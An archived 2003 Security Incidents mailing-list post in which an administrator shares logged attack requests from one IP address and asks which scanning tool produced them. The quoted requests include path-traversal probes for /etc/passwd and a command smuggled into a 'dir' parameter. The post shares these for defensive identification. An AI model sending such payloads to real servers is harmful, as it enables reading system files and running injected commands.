Security Incidents mailing list archives

Chinese source: some web attack tool

From: Paul <pbobby () stny rr com>
Date: 21 Mar 2003 22:14:50 -0000



Getting hammered by a Chinese site, 218.88.98.237.

Anyone else?

They are web attacks, and here is a sample of the various attempts it 
tries to make:

GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%
00 HTTP/1.0
GET /IISSamples/ExAir/search/query.asp HTTP/1.0 
GET /cgi-bin/sh HTTP/1.0 
GET /directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0 
GET /search.dll?search?query=%00&logic=AND HTTP/1.0 
GET /cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0 

and so forth. Anyone recognize the tool?

----------------------------------------------------------------------------

<Pre>Lose another weekend managing your IDS?
Take back your personal time.
15-day free trial of StillSecure Border Guard.</Pre>
<A href="http://www.securityfocus.com/stillsecure";> http://www.securityfocus.com/stillsecure </A>

Current thread:

Chinese source: some web attack tool Paul (Mar 22)
- AW: Chinese source: some web attack tool Tobias Lachmann (Mar 23)